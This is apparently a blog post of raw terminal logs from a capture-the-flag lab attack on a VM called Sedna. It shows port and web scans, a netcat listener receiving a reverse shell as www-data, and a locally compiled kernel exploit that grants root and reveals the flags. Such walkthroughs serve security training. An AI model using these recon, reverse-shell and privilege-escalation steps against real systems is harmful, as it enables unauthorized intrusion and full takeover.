This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nmap -sT -A -P0 172.16.94.135 | |
| Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-17 14:29 EDT | |
| Nmap scan report for 172.16.94.135 | |
| Host is up (0.00055s latency). | |
| Not shown: 989 closed ports | |
| PORT STATE SERVICE VERSION | |
| 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | |
| | ssh-hostkey: | |
| | 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA) | |
| | 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA) | |
| |_ 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA) | |
| 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu | |
| | dns-nsid: | |
| |_ bind.version: 9.9.5-3-Ubuntu | |
| 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | |
| | http-robots.txt: 1 disallowed entry | |
| |_Hackers | |
| |_http-server-header: Apache/2.4.7 (Ubuntu) | |
| |_http-title: Site doesn't have a title (text/html). | |
| 110/tcp open pop3? | |
| 111/tcp open rpcbind 2-4 (RPC #100000) | |
| | rpcinfo: | |
| | program version port/proto service | |
| | 100000 2,3,4 111/tcp rpcbind | |
| | 100000 2,3,4 111/udp rpcbind | |
| | 100024 1 38660/udp status | |
| |_ 100024 1 46739/tcp status | |
| 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) | |
| 143/tcp open imap Dovecot imapd | |
| |_imap-capabilities: CAPABILITY | |
| 445/tcp open netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP) | |
| 993/tcp open ssl/imap Dovecot imapd | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-07T19:17:14 | |
| |_Not valid after: 2026-10-07T19:17:14 | |
| |_ssl-date: TLS randomness does not represent time | |
| 995/tcp open ssl/pop3s? | |
| | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | |
| | Not valid before: 2016-10-07T19:17:14 | |
| |_Not valid after: 2026-10-07T19:17:14 | |
| |_ssl-date: ERROR: Script execution failed (use -d to debug) | |
| 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | |
| | http-methods: | |
| |_ Potentially risky methods: PUT DELETE | |
| |_http-open-proxy: Proxy might be redirecting requests | |
| |_http-server-header: Apache-Coyote/1.1 | |
| |_http-title: Apache Tomcat | |
| MAC Address: 00:0C:29:68:AD:36 (VMware) | |
| Device type: general purpose | |
| Running: Linux 3.X|4.X | |
| OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 | |
| OS details: Linux 3.2 - 4.6 | |
| Network Distance: 1 hop | |
| Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel | |
| Host script results: | |
| |_nbstat: NetBIOS name: SEDNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | |
| | smb-os-discovery: | |
| | OS: Unix (Samba 4.1.6-Ubuntu) | |
| | NetBIOS computer name: SEDNA\x00 | |
| | Workgroup: WORKGROUP\x00 | |
| |_ System time: 2017-03-17T14:31:40-04:00 | |
| | smb-security-mode: | |
| | account_used: guest | |
| | authentication_level: user | |
| | challenge_response: supported | |
| |_ message_signing: disabled (dangerous, but default) | |
| |_smbv2-enabled: Server supports SMBv2 protocol | |
| TRACEROUTE | |
| HOP RTT ADDRESS | |
| 1 0.55 ms 172.16.94.135 | |
| OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . | |
| Nmap done: 1 IP address (1 host up) scanned in 148.99 seconds | |
| root@kali:~# us -mT -Iv 172.16.94.135:a -r 3000 -R 3 && us -mU -Iv 172.16.94.135:a -r 3000 -R 3 | |
| adding 172.16.94.135/32 mode `TCPscan' ports `a' pps 3000 | |
| using interface(s) eth0 | |
| scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds | |
| TCP open 172.16.94.135:22 ttl 64 | |
| TCP open 172.16.94.135:995 ttl 64 | |
| TCP open 172.16.94.135:111 ttl 64 | |
| TCP open 172.16.94.135:8080 ttl 64 | |
| TCP open 172.16.94.135:139 ttl 64 | |
| TCP open 172.16.94.135:110 ttl 64 | |
| TCP open 172.16.94.135:53 ttl 64 | |
| TCP open 172.16.94.135:993 ttl 64 | |
| TCP open 172.16.94.135:445 ttl 64 | |
| TCP open 172.16.94.135:143 ttl 64 | |
| TCP open 172.16.94.135:50201 ttl 64 | |
| TCP open 172.16.94.135:80 ttl 64 | |
| sender statistics 1908.1 pps with 196608 packets sent total | |
| listener statistics 409090 packets recieved 0 packets droped and 0 interface drops | |
| TCP open ssh[ 22] from 172.16.94.135 ttl 64 | |
| TCP open domain[ 53] from 172.16.94.135 ttl 64 | |
| TCP open http[ 80] from 172.16.94.135 ttl 64 | |
| TCP open pop3[ 110] from 172.16.94.135 ttl 64 | |
| TCP open sunrpc[ 111] from 172.16.94.135 ttl 64 | |
| TCP open netbios-ssn[ 139] from 172.16.94.135 ttl 64 | |
| TCP open imap[ 143] from 172.16.94.135 ttl 64 | |
| TCP open microsoft-ds[ 445] from 172.16.94.135 ttl 64 | |
| TCP open imaps[ 993] from 172.16.94.135 ttl 64 | |
| TCP open pop3s[ 995] from 172.16.94.135 ttl 64 | |
| TCP open http-alt[ 8080] from 172.16.94.135 ttl 64 | |
| TCP open unknown[50201] from 172.16.94.135 ttl 64 | |
| adding 172.16.94.135/32 mode `UDPscan' ports `a' pps 3000 | |
| using interface(s) eth0 | |
| scaning 1.00e+00 total hosts with 1.97e+05 total packets, should take a little longer than 1 Minutes, 12 Seconds | |
| UDP open 172.16.94.135:53 ttl 64 | |
| UDP open 172.16.94.135:111 ttl 64 | |
| UDP open 172.16.94.135:137 ttl 64 | |
| UDP open 172.16.94.135:5353 ttl 255 | |
| sender statistics 1732.9 pps with 196635 packets sent total | |
| listener statistics 36 packets recieved 0 packets droped and 0 interface drops | |
| UDP open domain[ 53] from 172.16.94.135 ttl 64 | |
| UDP open sunrpc[ 111] from 172.16.94.135 ttl 64 | |
| UDP open netbios-ns[ 137] from 172.16.94.135 ttl 64 | |
| UDP open mdns[ 5353] from 172.16.94.135 ttl 255 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nikto -h http://172.16.94.135 | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 172.16.94.135 | |
| + Target Hostname: 172.16.94.135 | |
| + Target Port: 80 | |
| + Start Time: 2017-03-17 14:37:57 (GMT-4) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache/2.4.7 (Ubuntu) | |
| + Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + No CGI Directories found (use '-C all' to force check all possible dirs) | |
| + "robots.txt" contains 1 entry which should be manually viewed. | |
| + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. | |
| + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS | |
| + OSVDB-3268: /files/: Directory indexing found. | |
| + OSVDB-3092: /files/: This might be interesting... | |
| + OSVDB-3092: /system/: This might be interesting... | |
| + OSVDB-3233: /icons/README: Apache default file found. | |
| + OSVDB-3092: /license.txt: License file found may identify site software. | |
| + 7536 requests: 0 error(s) and 12 item(s) reported on remote host | |
| + End Time: 2017-03-17 14:38:32 (GMT-4) (35 seconds) | |
| --------------------------------------------------------------------------- | |
| + 1 host(s) tested | |
| root@kali:/tmp# nikto -h http://172.16.94.135:8080 | |
| - Nikto v2.1.6 | |
| --------------------------------------------------------------------------- | |
| + Target IP: 172.16.94.135 | |
| + Target Hostname: 172.16.94.135 | |
| + Target Port: 8080 | |
| + Start Time: 2017-03-17 14:39:49 (GMT-4) | |
| --------------------------------------------------------------------------- | |
| + Server: Apache-Coyote/1.1 | |
| + Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000 | |
| + The anti-clickjacking X-Frame-Options header is not present. | |
| + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS | |
| + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type | |
| + No CGI Directories found (use '-C all' to force check all possible dirs) | |
| + Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS | |
| + OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server. | |
| + OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server. | |
| + /: Appears to be a default Apache Tomcat install. | |
| + /examples/servlets/index.html: Apache Tomcat default JSP pages present. | |
| + OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. | |
| + /manager/html: Default Tomcat Manager / Host Manager interface found | |
| + /host-manager/html: Default Tomcat Manager / Host Manager interface found | |
| + /manager/status: Default Tomcat Server Status interface found | |
| + 7839 requests: 0 error(s) and 13 item(s) reported on remote host | |
| + End Time: 2017-03-17 14:40:30 (GMT-4) (41 seconds) | |
| --------------------------------------------------------------------------- | |
| + 1 host(s) tested |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@kali:/tmp# nc -lvp 443 | |
| listening on [any] 443 ... | |
| 172.16.94.135: inverse host lookup failed: Unknown host | |
| connect to [172.16.94.130] from (UNKNOWN) [172.16.94.135] 58774 | |
| Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux | |
| 14:57:01 up 2 days, 20 min, 0 users, load average: 0.00, 0.03, 0.05 | |
| USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
| /bin/sh: 0: can't access tty; job control turned off | |
| $ id | |
| uid=33(www-data) gid=33(www-data) groups=33(www-data) | |
| $ uname -a | |
| Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux | |
| www-data@Sedna:/var/www$ cat flag.txt | |
| cat flag.txt | |
| bfbb7e6e6e88d9ae66848b9aeac6b289 | |
| www-data@Sedna:/var/www$ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid | |
| gcc newpid.c -o newpid | |
| newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp] | |
| # warning this file must be compiled with -static | |
| ^ | |
| www-data@Sedna:/tmp/sploits/expl$ ./newpid | |
| ./newpid | |
| newpid: you *must* compile with -static | |
| www-data@Sedna:/tmp/sploits/expl$ gcc newpid.c -o newpid -static | |
| gcc newpid.c -o newpid -static | |
| newpid.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp] | |
| # warning this file must be compiled with -static | |
| ^ | |
| www-data@Sedna:/tmp/sploits/expl$ ./newpid | |
| ./newpid | |
| uid=0(root) gid=33(www-data) groups=0(root),33(www-data) | |
| # id | |
| id | |
| uid=0(root) gid=33(www-data) groups=0(root),33(www-data) | |
| # pwd | |
| pwd | |
| /tmp/sploits/expl | |
| # cd /root | |
| cd /root | |
| # ls | |
| ls | |
| 8d2daf441809dcd86398d3d750d768b5-BuilderEngine-CMS-V3.zip chkrootkit flag.txt | |
| # cat flag.txt | |
| cat flag.txt | |
| a10828bee17db751de4b936614558305 | |
| # |
No comments:
Post a Comment